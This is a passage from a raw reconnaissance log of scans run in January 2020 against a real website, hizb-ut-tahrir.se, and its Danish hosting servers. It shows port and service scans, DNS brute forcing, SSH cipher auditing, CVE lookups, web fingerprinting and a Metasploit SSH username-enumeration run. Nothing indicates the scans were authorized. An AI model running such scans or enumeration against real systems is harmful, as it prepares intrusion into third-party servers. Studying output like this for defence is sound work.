1104 Script Info: | dns-nsid:
1105 Script Info: | NSID: ns4.unoeuro.com (6e73342e756e6f6575726f2e636f6d)
1106 Script Info: |_ id.server: ns4.unoeuro.com
1107 Script Info: | fingerprint-strings:
1108 Script Info: | DNSVersionBindReqTCP:
1109 Script Info: | version
1110 Script Info: |_ bind
1111 IP: 93.191.156.197
1112 HostName: www.hizb-ut-tahrir.se. Type: A
1113 Country: Denmark
1114 Is Active: True (reset ttl 64)
1115 Port: 21/tcp open tcpwrapped syn-ack ttl 43
1116 Port: 22/tcp open ssh syn-ack ttl 45 OpenSSH 5.3 (protocol 2.0)
1117 Script Info: | ssh-hostkey:
1118 Script Info: | 1024 fa:d3:03:2f:db:82:8d:21:30:46:74:25:37:bb:fa:3e (DSA)
1119 Script Info: |_ 2048 e1:2a:51:40:6c:bd:91:34:21:28:ab:59:64:59:9b:4a (RSA)
1120 Script Info: | vulners:
1121 Script Info: | cpe:/a:openbsd:openssh:5.3:
1122 Script Info: | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
1123 Script Info: | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
1124 Script Info: | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1125 Script Info: | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
1126 Script Info: | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
1127 Script Info: | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
1128 Script Info: | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
1129 Script Info: | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
1130 Script Info: | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
1131 Script Info: |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
1132 Port: 80/tcp open http syn-ack ttl 44 Apache httpd
1133 Script Info: | http-methods:
1134 Script Info: |_ Supported Methods: OPTIONS HEAD GET POST
1135 Script Info: |_http-server-header: Apache
1136 Script Info: |_http-title: This server is operated by UnoEuro Webhosting
1137 Port: 443/tcp open ssl/http syn-ack ttl 43 Apache httpd
1138 Script Info: |_http-server-header: Apache
1139 Script Info: |_http-title: 403 Forbidden
1140 Script Info: | ssl-cert: Subject: commonName=*.unoeuro.com
1141 Script Info: | Subject Alternative Name: DNS:*.unoeuro.com, DNS:unoeuro.com
1142 Script Info: | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1143 Script Info: | Public Key type: rsa
1144 Script Info: | Public Key bits: 2048
1145 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1146 Script Info: | Not valid before: 2019-02-06T00:00:00
1147 Script Info: | Not valid after: 2021-02-05T23:59:59
1148 Script Info: | MD5: 672e f1c5 0cc7 d81f 31c1 9cd8 88cc 6bcc
1149 Script Info: |_SHA-1: 5c07 943f ab62 063e ae87 bb01 ef12 98d0 faae ac4e
1150 IP: 94.231.96.0
1151 Type: SPF
1152 Is Active: True (reset ttl 64)
1153 IP: 93.191.156.0
1154 Type: SPF
1155 Is Active: True (reset ttl 64)
1156 IP: 46.36.215.2
1157 HostName: ns1.unoeuro.com Type: NS
1158 HostName: ns1.unoeuro.com Type: PTR
1159 Country: Denmark
1160 Is Active: True (reset ttl 64)
1161 Port: 53/tcp open domain? syn-ack ttl 48
1162 Script Info: | dns-nsid:
1163 Script Info: | NSID: ns1.unoeuro.com (6e73312e756e6f6575726f2e636f6d)
1164 Script Info: |_ id.server: ns1.unoeuro.com
1165 Script Info: | fingerprint-strings:
1166 Script Info: | DNSVersionBindReqTCP:
1167 Script Info: | version
1168 Script Info: |_ bind
1169 IP: 185.25.141.15
1170 HostName: ns2.unoeuro.com Type: NS
1171 HostName: ns2.unoeuro.com Type: PTR
1172 Country: Denmark
1173 Is Active: True (reset ttl 64)
1174 Port: 22/tcp open ssh syn-ack ttl 45 OpenSSH 7.4 (protocol 2.0)
1175 Script Info: | ssh-hostkey:
1176 Script Info: | 2048 14:8f:1f:90:fa:70:dd:8b:28:85:7d:f6:a3:f1:f7:ba (RSA)
1177 Script Info: |_ 256 c2:58:48:28:0f:4b:ee:10:0c:b1:4c:17:6c:ed:64:cc (ECDSA)
1178 Script Info: | vulners:
1179 Script Info: | cpe:/a:openbsd:openssh:7.4:
1180 Script Info: | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
1181 Script Info: |_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
1182 Port: 53/tcp open domain? syn-ack ttl 47
1183 Script Info: | dns-nsid:
1184 Script Info: | NSID: ns2.unoeuro.com (6e73322e756e6f6575726f2e636f6d)
1185 Script Info: |_ id.server: ns2.unoeuro.com
1186 Script Info: | fingerprint-strings:
1187 Script Info: | DNSVersionBindReqTCP:
1188 Script Info: | version
1189 Script Info: |_ bind
1190 Port: 111/tcp open rpcbind syn-ack ttl 45 2-4 (RPC #100000)
1191 Script Info: | rpcinfo:
1192 Script Info: | program version port/proto service
1193 Script Info: | 100000 2,3,4 111/tcp rpcbind
1194 Script Info: | 100000 2,3,4 111/udp rpcbind
1195 Script Info: | 100000 3,4 111/tcp6 rpcbind
1196 Script Info: |_ 100000 3,4 111/udp6 rpcbind
1197 Port: 3306/tcp open mysql syn-ack ttl 44 MySQL (unauthorized)
1198
1199--------------End Summary --------------
1200-----------------------------------------
1201#####################################################################################################################################
1202----- hizb-ut-tahrir.se -----
1203
1204
1205Host's addresses:
1206__________________
1207
1208hizb-ut-tahrir.se. 1693 IN A 93.191.156.197
1209
1210
1211Wildcard detection using: eqoacoiospjp
1212_______________________________________
1213
1214eqoacoiospjp.hizb-ut-tahrir.se. 3600 IN A 93.191.156.197
1215
1216
1217!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1218
1219 Wildcards detected, all subdomains will point to the same IP address
1220 Omitting results containing 93.191.156.197.
1221 Maybe you are using OpenDNS servers.
1222
1223!!!!!!!!!!!!!!!!!!!!!!!!!!!!
1224
1225
1226Name Servers:
1227______________
1228
1229ns3.unoeuro.com. 85604 IN A 83.217.78.186
1230ns4.unoeuro.com. 85604 IN A 85.159.211.233
1231ns1.unoeuro.com. 85818 IN A 46.36.215.2
1232ns2.unoeuro.com. 85604 IN A 185.25.141.15
1233
1234
1235Mail (MX) Servers:
1236___________________
1237
1238mx.unoeuro.com. 3051 IN A 94.231.103.108
1239
1240
1241
1242Brute forcing with /usr/share/dnsenum/dns.txt:
1243_______________________________________________
1244
1245mail.hizb-ut-tahrir.se. 2205 IN CNAME mail.unoeuro.com.
1246mail.unoeuro.com. 7 IN A 94.231.103.107
1247smtp.hizb-ut-tahrir.se. 2976 IN CNAME asmtp.unoeuro.com.
1248asmtp.unoeuro.com. 600 IN A 94.231.106.220
1249
1250
1251Launching Whois Queries:
1252_________________________
1253
1254 whois ip result: 93.191.156.0 -> 93.191.156.0/24
1255
1256
1257hizb-ut-tahrir.se_________________
1258
1259 93.191.156.0/24
1260######################################################################################################################################
1261WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
1262Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:32 EST
1263Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1264Host is up (0.30s latency).
1265Not shown: 489 filtered ports, 3 closed ports
1266Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1267PORT STATE SERVICE
126821/tcp open ftp
126922/tcp open ssh
127080/tcp open http
1271443/tcp open https
1272
1273Nmap done: 1 IP address (1 host up) scanned in 12.37 seconds
1274######################################################################################################################################
1275Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:32 EST
1276Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1277Host is up (0.18s latency).
1278Not shown: 2 filtered ports
1279PORT STATE SERVICE
128053/udp open|filtered domain
128167/udp open|filtered dhcps
128268/udp open|filtered dhcpc
128369/udp open|filtered tftp
128488/udp open|filtered kerberos-sec
1285123/udp open|filtered ntp
1286139/udp open|filtered netbios-ssn
1287161/udp open|filtered snmp
1288162/udp open|filtered snmptrap
1289389/udp open|filtered ldap
1290500/udp open|filtered isakmp
1291520/udp open|filtered route
12922049/udp open|filtered nfs
1293
1294Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds
1295######################################################################################################################################
1296Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:32 EST
1297NSE: Loaded 55 scripts for scanning.
1298NSE: Script Pre-scanning.
1299Initiating NSE at 19:32
1300Completed NSE at 19:32, 0.00s elapsed
1301Initiating NSE at 19:32
1302Completed NSE at 19:32, 0.00s elapsed
1303Initiating Parallel DNS resolution of 1 host. at 19:32
1304Completed Parallel DNS resolution of 1 host. at 19:32, 0.02s elapsed
1305Initiating SYN Stealth Scan at 19:32
1306Scanning linux307.unoeuro.com (93.191.156.197) [1 port]
1307Discovered open port 21/tcp on 93.191.156.197
1308Completed SYN Stealth Scan at 19:32, 0.27s elapsed (1 total ports)
1309Initiating Service scan at 19:32
1310Scanning 1 service on linux307.unoeuro.com (93.191.156.197)
1311Completed Service scan at 19:32, 0.77s elapsed (1 service on 1 host)
1312Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
1313Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
1314Initiating Traceroute at 19:32
1315Completed Traceroute at 19:32, 0.85s elapsed
1316Initiating Parallel DNS resolution of 12 hosts. at 19:32
1317Completed Parallel DNS resolution of 12 hosts. at 19:32, 0.99s elapsed
1318NSE: Script scanning 93.191.156.197.
1319Initiating NSE at 19:32
1320NSE Timing: About 71.23% done; ETC: 19:34 (0:00:30 remaining)
1321Completed NSE at 19:34, 90.81s elapsed
1322Initiating NSE at 19:34
1323Completed NSE at 19:34, 0.05s elapsed
1324Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1325Host is up (0.42s latency).
1326
1327PORT STATE SERVICE VERSION
132821/tcp open tcpwrapped
1329Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1330Device type: general purpose|firewall|storage-misc|VoIP phone
1331Running (JUST GUESSING): Linux 2.6.X|3.X (91%), WatchGuard Fireware 11.X (91%), Synology DiskStation Manager 5.X (90%), Grandstream embedded (85%)
1332OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3.10 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel cpe:/a:synology:diskstation_manager:5.1 cpe:/h:grandstream:gxv3275
1333Aggressive OS guesses: Linux 2.6.32 (91%), Linux 2.6.32 or 3.10 (91%), Linux 2.6.39 (91%), Linux 3.10 (91%), Linux 3.4 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Synology DiskStation Manager 5.1 (90%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%)
1334No exact OS matches for host (test conditions non-ideal).
1335Uptime guess: 1.853 days (since Tue Jan 14 23:05:30 2020)
1336Network Distance: 13 hops
1337TCP Sequence Prediction: Difficulty=259 (Good luck!)
1338IP ID Sequence Generation: All zeros
1339
1340TRACEROUTE (using port 21/tcp)
1341HOP RTT ADDRESS
13421 370.25 ms 10.248.204.1
13432 370.34 ms salmondeal.com.0.116.160.in-addr.arpa (160.116.0.161)
13443 370.31 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
13454 370.45 ms bzq-219-189-185.cablep.bezeqint.net (62.219.189.185)
13465 370.35 ms bzq-114-65-1.cust.bezeqint.net (192.114.65.1)
13476 370.39 ms bzq-179-161-218.pop.bezeqint.net (212.179.161.218)
13487 370.46 ms ae8.cr1-fra2.ip4.gtt.net (46.33.89.237)
13498 370.50 ms ae13.cr1-ams2.ip4.gtt.net (89.149.143.2)
13509 528.13 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
135110 213.06 ms ge8-0.1000M.asd9nxg1.ip.tele.dk (213.200.75.30)
135211 464.33 ms cpe.xe-5-0-0-100.sdnqe10.dk.customer.tdc.net (87.51.85.234)
135312 469.46 ms 212.237.248.5
135413 469.48 ms linux307.unoeuro.com (93.191.156.197)
1355
1356NSE: Script Post-scanning.
1357Initiating NSE at 19:34
1358Completed NSE at 19:34, 0.00s elapsed
1359Initiating NSE at 19:34
1360Completed NSE at 19:34, 0.00s elapsed
1361######################################################################################################################################
1362# general
1363(gen) banner: SSH-2.0-OpenSSH_5.3
1364(gen) software: OpenSSH 5.3
1365(gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
1366(gen) compression: enabled (zlib@openssh.com)
1367
1368# key exchange algorithms
1369(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
1370 `- [info] available since OpenSSH 4.4
1371(kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1372 `- [warn] using weak hashing algorithm
1373 `- [info] available since OpenSSH 2.3.0
1374(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
1375 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
1376(kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1377 `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
1378 `- [warn] using small 1024-bit modulus
1379 `- [warn] using weak hashing algorithm
1380 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1381
1382# host-key algorithms
1383(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
1384(key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
1385 `- [warn] using small 1024-bit modulus
1386 `- [warn] using weak random number generator could reveal the key
1387 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1388
1389# encryption algorithms (ciphers)
1390(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1391(enc) aes192-ctr -- [info] available since OpenSSH 3.7
1392(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
1393(enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1394 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1395 `- [warn] using weak cipher
1396 `- [info] available since OpenSSH 4.2
1397(enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1398 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1399 `- [warn] using weak cipher
1400 `- [info] available since OpenSSH 4.2
1401(enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1402 `- [warn] using weak cipher mode
1403 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
1404(enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1405 `- [warn] using weak cipher
1406 `- [warn] using weak cipher mode
1407 `- [warn] using small 64-bit block size
1408 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1409(enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1410 `- [fail] disabled since Dropbear SSH 0.53
1411 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1412 `- [warn] using weak cipher mode
1413 `- [warn] using small 64-bit block size
1414 `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
1415(enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1416 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1417 `- [warn] using weak cipher mode
1418 `- [warn] using small 64-bit block size
1419 `- [info] available since OpenSSH 2.1.0
1420(enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1421 `- [warn] using weak cipher mode
1422 `- [info] available since OpenSSH 2.3.0
1423(enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1424 `- [warn] using weak cipher mode
1425 `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
1426(enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1427 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1428 `- [warn] using weak cipher
1429 `- [info] available since OpenSSH 2.1.0
1430(enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1431 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1432 `- [warn] using weak cipher mode
1433 `- [info] available since OpenSSH 2.3.0
1434
1435# message authentication code algorithms
1436(mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1437 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1438 `- [warn] using encrypt-and-MAC mode
1439 `- [warn] using weak hashing algorithm
1440 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1441(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
1442 `- [warn] using weak hashing algorithm
1443 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
1444(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
1445 `- [warn] using small 64-bit tag size
1446 `- [info] available since OpenSSH 4.7
1447(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
1448 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1449(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
1450 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
1451(mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1452 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1453 `- [warn] using encrypt-and-MAC mode
1454 `- [info] available since OpenSSH 2.5.0
1455(mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1456 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1457 `- [warn] using encrypt-and-MAC mode
1458 `- [info] available since OpenSSH 2.1.0
1459(mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1460 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1461 `- [warn] using encrypt-and-MAC mode
1462 `- [warn] using weak hashing algorithm
1463 `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
1464(mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
1465 `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
1466 `- [warn] using encrypt-and-MAC mode
1467 `- [warn] using weak hashing algorithm
1468 `- [info] available since OpenSSH 2.5.0
1469
1470# algorithm recommendations (for OpenSSH 5.3)
1471(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
1472(rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
1473(rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
1474(rec) -ssh-dss -- key algorithm to remove
1475(rec) -arcfour -- enc algorithm to remove
1476(rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
1477(rec) -blowfish-cbc -- enc algorithm to remove
1478(rec) -3des-cbc -- enc algorithm to remove
1479(rec) -aes256-cbc -- enc algorithm to remove
1480(rec) -arcfour256 -- enc algorithm to remove
1481(rec) -cast128-cbc -- enc algorithm to remove
1482(rec) -aes192-cbc -- enc algorithm to remove
1483(rec) -arcfour128 -- enc algorithm to remove
1484(rec) -aes128-cbc -- enc algorithm to remove
1485(rec) -hmac-md5-96 -- mac algorithm to remove
1486(rec) -hmac-ripemd160 -- mac algorithm to remove
1487(rec) -hmac-sha1-96 -- mac algorithm to remove
1488(rec) -umac-64@openssh.com -- mac algorithm to remove
1489(rec) -hmac-md5 -- mac algorithm to remove
1490(rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
1491(rec) -hmac-sha1 -- mac algorithm to remove
1492#######################################################################################################################################
1493USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
1494RHOSTS => 93.191.156.197
1495RHOST => 93.191.156.197
1496[*] 93.191.156.197:22 - SSH - Using malformed packet technique
1497[*] 93.191.156.197:22 - SSH - Starting scan
1498[+] 93.191.156.197:22 - SSH - User 'admin' found
1499[+] 93.191.156.197:22 - SSH - User 'administrator' found
1500[+] 93.191.156.197:22 - SSH - User 'anonymous' found
1501[+] 93.191.156.197:22 - SSH - User 'backup' found
1502[+] 93.191.156.197:22 - SSH - User 'bee' found
1503[+] 93.191.156.197:22 - SSH - User 'ftp' found
1504[+] 93.191.156.197:22 - SSH - User 'guest' found
1505[+] 93.191.156.197:22 - SSH - User 'GUEST' found
1506[+] 93.191.156.197:22 - SSH - User 'info' found
1507[+] 93.191.156.197:22 - SSH - User 'mail' found
1508[+] 93.191.156.197:22 - SSH - User 'mailadmin' found
1509[+] 93.191.156.197:22 - SSH - User 'msfadmin' found
1510[+] 93.191.156.197:22 - SSH - User 'mysql' found
1511[+] 93.191.156.197:22 - SSH - User 'nobody' found
1512[+] 93.191.156.197:22 - SSH - User 'oracle' found
1513[+] 93.191.156.197:22 - SSH - User 'owaspbwa' found
1514[+] 93.191.156.197:22 - SSH - User 'postfix' found
1515[+] 93.191.156.197:22 - SSH - User 'postgres' found
1516[+] 93.191.156.197:22 - SSH - User 'private' found
1517[+] 93.191.156.197:22 - SSH - User 'proftpd' found
1518[+] 93.191.156.197:22 - SSH - User 'public' found
1519[+] 93.191.156.197:22 - SSH - User 'root' found
1520[+] 93.191.156.197:22 - SSH - User 'superadmin' found
1521[+] 93.191.156.197:22 - SSH - User 'support' found
1522[+] 93.191.156.197:22 - SSH - User 'sys' found
1523[+] 93.191.156.197:22 - SSH - User 'system' found
1524[+] 93.191.156.197:22 - SSH - User 'systemadmin' found
1525[+] 93.191.156.197:22 - SSH - User 'systemadministrator' found
1526[+] 93.191.156.197:22 - SSH - User 'test' found
1527[+] 93.191.156.197:22 - SSH - User 'tomcat' found
1528[+] 93.191.156.197:22 - SSH - User 'user' found
1529[+] 93.191.156.197:22 - SSH - User 'webmaster' found
1530[+] 93.191.156.197:22 - SSH - User 'www-data' found
1531[+] 93.191.156.197:22 - SSH - User 'Fortimanager_Access' found
1532[*] Scanned 1 of 1 hosts (100% complete)
1533[*] Auxiliary module execution completed
1534#######################################################################################################################################
1535HTTP/1.1 406 Not Acceptable
1536Date: Fri, 17 Jan 2020 00:37:27 GMT
1537Server: Apache
1538Content-Type: text/html; charset=iso-8859-1
1539####################################################################################################################################
1540http://93.191.156.197 [200 OK] Apache, Country[DENMARK][DK], HTML5, HTTPServer[Apache], IP[93.191.156.197], Open-Graph-Protocol[website], Title[This server is operated by UnoEuro Webhosting], UncommonHeaders[upgrade]
1541######################################################################################################################################
1542
1543wig - WebApp Information Gatherer
1544
1545
1546Scanning http://93.191.156.197...
1547___________________ SITE INFO ____________________
1548IP Title
154993.191.156.197 This server is operated by UnoEu
1550
1551____________________ VERSION _____________________
1552Name Versions Type
1553Apache Platform
1554PHP 7.2.26 Platform
1555
1556__________________ INTERESTING ___________________
1557URL Note Type
1558/phpinfo.php PHP info file Interesting
1559
1560__________________________________________________
1561Time: 54.8 sec Urls: 599 Fingerprints: 40401
1562######################################################################################################################################
1563https://93.191.156.197 [302 Found] Apache, Country[DENMARK][DK], HTTPServer[Apache], IP[93.191.156.197], RedirectLocation[http://93.191.156.197/], Title[302 Found]
1564http://93.191.156.197/ [200 OK] Apache, Country[DENMARK][DK], HTML5, HTTPServer[Apache], IP[93.191.156.197], Open-Graph-Protocol[website], Title[This server is operated by UnoEuro Webhosting], UncommonHeaders[upgrade]
1565######################################################################################################################################
1566Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-16 19:39 EST
1567NSE: Loaded 162 scripts for scanning.
1568NSE: Script Pre-scanning.
1569Initiating NSE at 19:39
1570Completed NSE at 19:39, 0.00s elapsed
1571Initiating NSE at 19:39
1572Completed NSE at 19:39, 0.00s elapsed
1573Initiating Parallel DNS resolution of 1 host. at 19:39
1574Completed Parallel DNS resolution of 1 host. at 19:39, 0.02s elapsed
1575Initiating SYN Stealth Scan at 19:39
1576Scanning linux307.unoeuro.com (93.191.156.197) [1 port]
1577Discovered open port 443/tcp on 93.191.156.197
1578Completed SYN Stealth Scan at 19:39, 0.27s elapsed (1 total ports)
1579Initiating Service scan at 19:39
1580Scanning 1 service on linux307.unoeuro.com (93.191.156.197)
1581Completed Service scan at 19:40, 13.56s elapsed (1 service on 1 host)
1582Initiating OS detection (try #1) against linux307.unoeuro.com (93.191.156.197)
1583Retrying OS detection (try #2) against linux307.unoeuro.com (93.191.156.197)
1584Initiating Traceroute at 19:40
1585Completed Traceroute at 19:40, 3.40s elapsed
1586Initiating Parallel DNS resolution of 12 hosts. at 19:40
1587Completed Parallel DNS resolution of 12 hosts. at 19:40, 0.45s elapsed
1588NSE: Script scanning 93.191.156.197.
1589Initiating NSE at 19:40
1590Completed NSE at 19:41, 91.04s elapsed
1591Initiating NSE at 19:41
1592Completed NSE at 19:41, 3.70s elapsed
1593Nmap scan report for linux307.unoeuro.com (93.191.156.197)
1594Host is up (0.35s latency).
1595
1596PORT STATE SERVICE VERSION
1597443/tcp open ssl/http Apache httpd
1598|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
1599| http-brute:
1600|_ Path "/" does not require authentication
1601|_http-chrono: Request times for /; avg: 1808.50ms; min: 1565.00ms; max: 1945.05ms
1602|_http-csrf: Couldn't find any CSRF vulnerabilities.
1603|_http-date: Fri, 17 Jan 2020 00:40:22 GMT; -6s from local time.
1604| http-default-accounts:
1605| [Arris 2307] at /logo_t.gif
1606|_ <blank>:<blank>
1607|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
1608|_http-dombased-xss: Couldn't find any DOM based XSS.
1609| http-errors:
1610| Spidering limited to: maxpagecount=40; withinhost=linux307.unoeuro.com
1611| Found the following error pages:
1612|
1613| Error Code: 403
1614|_ http://linux307.unoeuro.com:443/
1615|_http-feed: Couldn't find any feeds.
1616|_http-fetch: Please enter the complete path of the directory to save data in.
1617| http-headers:
1618| Date: Fri, 17 Jan 2020 00:40:50 GMT
1619| Server: Apache
1620| Content-Length: 483
1621| Connection: close
1622| Content-Type: text/html; charset=iso-8859-1
1623|
1624|_ (Request type: GET)
1625|_http-jsonp-detection: Couldn't find any JSONP endpoints.
1626|_http-mobileversion-checker: No mobile version detected.
1627| http-security-headers:
1628| Strict_Transport_Security:
1629|_ HSTS not configured in HTTPS Server
1630|_http-server-header: Apache
1631| http-sitemap-generator:
1632| Directory structure:
1633| Longest directory structure:
1634| Depth: 0
1635| Dir: /
1636| Total files found (by extension):
1637|_
1638|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
1639|_http-title: 403 Forbidden
1640|_http-userdir-enum: Potential Users: root, admin, administrator, webadmin, sysadmin, netadmin, guest, user, web, test
1641| http-vhosts:
1642|_127 names had status 403
1643|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
1644|_http-xssed: No previously reported XSS vuln.
1645| vulscan: VulDB - https://vuldb.com:
1646| [141649] Apache OFBiz up to 16.11.05 Form Widget Freemarker Markup Code Execution
1647| [141648] Apache OFBiz up to 16.11.05 Application Stored cross site scripting
1648| [140386] Apache Commons Beanutils 1.9.2 BeanIntrospector unknown vulnerability
1649| [139708] Apache Ranger up to 1.2.0 Policy Import cross site scripting
1650| [139540] cPanel up to 60.0.24 Apache HTTP Server Key information disclosure
1651| [139386] Apache Tike up to 1.21 RecursiveParserWrapper Stack-based memory corruption
1652| [139385] Apache Tika 1.19/1.20/1.21 SAXParsers Hang denial of service
1653| [139384] Apache Tika up to 1.21 RecursiveParserWrapper ZIP File denial of service
1654| [139261] Apache Solr 8.2.0 DataImportHandler Parameter unknown vulnerability
1655| [139259] cPanel up to 68.0.26 WHM Apache Includes Editor information disclosure
1656| [139256] cPanel up to 68.0.26 WHM Apache Configuration Include Editor cross site scripting
1657| [139239] cPanel up to 70.0.22 Apache HTTP Server Log information disclosure
1658| [139141] Apache ActiveMQ Client up to 5.15.4 ActiveMQConnection.java ActiveMQConnection denial of service
1659| [139130] cPanel up to 73.x Apache HTTP Server Injection privilege escalation
1660| [138914] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 VM sql injection
1661| [138913] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Block Argument privilege escalation
1662| [138912] Venustech Apache VCL 2.1/2.2/2.3/2.4/2.5 Cookie sql injection
1663| [138816] Apache Storm up to 1.2.2 Logviewer Daemon Log information disclosure
1664| [138815] Apache Storm up to 1.2.2 UI Daemon Deserialization privilege escalation
1665| [138164] Oracle 2.7.0.1 Apache Log4j unknown vulnerability
1666| [138155] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Tomcat unknown vulnerability
1667| [138151] Oracle Transportation Management 6.3.7 Apache Tomcat unknown vulnerability
1668| [138149] Oracle Agile Engineering Data Management 6.2.0/6.2.1 Apache Commons FileUpload unknown vulnerability
1669| [138131] Oracle MICROS Retail XBRi Loss Prevention 10.8.0/10.8.1/10.8.2/10.8.3 Apache Tomcat unknown vulnerability
1670| [138129] Oracle Retail Xstore Point of Service 7.0/7.1 Apache HTTP Server denial of service
1671| [138123] Oracle Retail Order Management System 5.0 Apache Struts 1 unknown vulnerability
1672| [138122] Oracle Retail Order Broker 5.2/15.0 Apache Tomcat unknown vulnerability
1673| [138121] Oracle Retail Order Broker 5.2/15.0 Apache CXF unknown vulnerability
1674| [138112] Oracle Retail Integration Bus 15.0/16.0 Apache Commons FileUpload unknown vulnerability
